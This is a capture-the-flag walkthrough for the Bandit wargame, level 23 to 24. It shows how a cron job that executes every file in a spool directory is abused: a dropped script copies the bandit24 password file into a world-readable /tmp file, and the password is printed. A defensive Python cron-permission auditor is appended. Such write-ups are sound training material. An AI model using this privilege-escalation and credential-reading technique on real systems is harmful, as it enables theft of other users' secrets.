Bandit Level 23 → Level 24

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

Solution

bandit23@bandit:~$ ls -l /etc/cron.d/
total 12
-rw-r--r-- 1 root root 120 Oct 16  2018 cronjob_bandit22
-rw-r--r-- 1 root root 122 Oct 16  2018 cronjob_bandit23
-rw-r--r-- 1 root root 120 Oct 16  2018 cronjob_bandit24
bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        timeout -s 9 60 ./$i
        rm -f ./$i
    fi
done

Reading the shell script, we can see that bandit24 executes every file under /var/spool/bandit24, so we need to create a file that bandit24 can execute and have it write the bandit24 password into a world-readable file under /tmp/.

bandit23@bandit:~$ clear
bandit23@bandit:~$ mktemp
/tmp/tmp.Mcx9oNLd3Q
bandit23@bandit:~$ mktemp
/tmp/tmp.HsO4hET86S
bandit23@bandit:~$ vim /tmp/tmp.HsO4hET86S
...
bandit23@bandit:~$ cat /tmp/tmp.HsO4hET86S
#!/bin/bash

cat /etc/bandit_pass/bandit24 > /tmp/tmp.Mcx9oNLd3Q
bandit23@bandit:~$ chmod +rx /tmp/tmp.HsO4hET86S
bandit23@bandit:~$ ls -l /tmp/tmp.HsO4hET86S
-rwxr-xr-x 1 bandit23 root 65 Sep 10 16:43 /tmp/tmp.HsO4hET86S
bandit23@bandit:~$ chmod 666 /tmp/tmp.Mcx9oNLd3Q
bandit23@bandit:~$ ls -l /tmp/tmp.Mcx9oNLd3Q
-rw-rw-rw- 1 bandit23 root 0 Sep 10 16:42 /tmp/tmp.Mcx9oNLd3Q
bandit23@bandit:~$ cp /tmp/tmp.HsO4hET86S /var/spool/bandit24/

... wait

bandit23@bandit:~$ cat /tmp/tmp.Mcx9oNLd3Q
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

Key points

  1. Read bandit24's script and understand what it does;
  2. Pay attention to permission control: the script file we write must be executable by a third party (rx), and the target file must be writable by a third party (rw).
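As an added example from the defender's side (not part of this writeup or of the Bandit game itself), the following Python script parses /etc/cron.d-style entries like the two shown above and reports every job whose program, or the directory holding it, is writable by someone other than root, which is exactly the condition that lets a third party's file run under the job's user. The sample cron lines are the ones shown above; the finding labels are my own.

```python
import os
import stat
from collections import namedtuple

CronJob = namedtuple("CronJob", "schedule user command program")  # program = first word of command
SPECIAL = ("@reboot", "@yearly", "@annually", "@monthly", "@weekly", "@daily", "@hourly")

# Constructed sample: the two cron.d lines shown in the walkthrough above.
SAMPLE_CRON_D = ("@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null\n"
                 "* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null\n")

def parse_cron_d(text):
    """Parse /etc/cron.d lines (schedule, user, command); skip comments and VAR=value lines."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split(None, 1)[0]:
            continue
        special = line.startswith(SPECIAL)
        parts = line.split(None, 2) if special else line.split(None, 6)
        if len(parts) < (3 if special else 7):
            continue  # malformed; cron would not run it either
        jobs.append(CronJob(" ".join(parts[:-2]), parts[-2], parts[-1], parts[-1].split()[0]))
    return jobs

def perm_findings(mode, uid):
    """Who besides root could modify an object with this stat mode and owner uid?"""
    findings = (["world-writable"] if mode & stat.S_IWOTH
                else ["group-writable"] if mode & stat.S_IWGRP else [])
    if uid != 0:
        findings.append(f"owned by uid {uid}, not root")
    return findings

def audit_path(path):
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return ["missing"]  # dangling job: whoever can create the path controls what runs
    return perm_findings(st.st_mode, st.st_uid)

def audit_cron_d_text(text):
    """Return [(job, findings)] for jobs whose program or its directory is not root-controlled."""
    report = []
    for job in parse_cron_d(text):
        findings = [f"{p}: {f}" for p in (job.program, os.path.dirname(job.program) or ".")
                    for f in audit_path(p)]
        if findings:
            report.append((job, findings))
    return report
```

Run it over the real files with `audit_cron_d_text(open(path).read())` for each path in /etc/cron.d; the spool-directory pattern in the level's script is the same risk one level down, so directories a job script reads executables from deserve the same check.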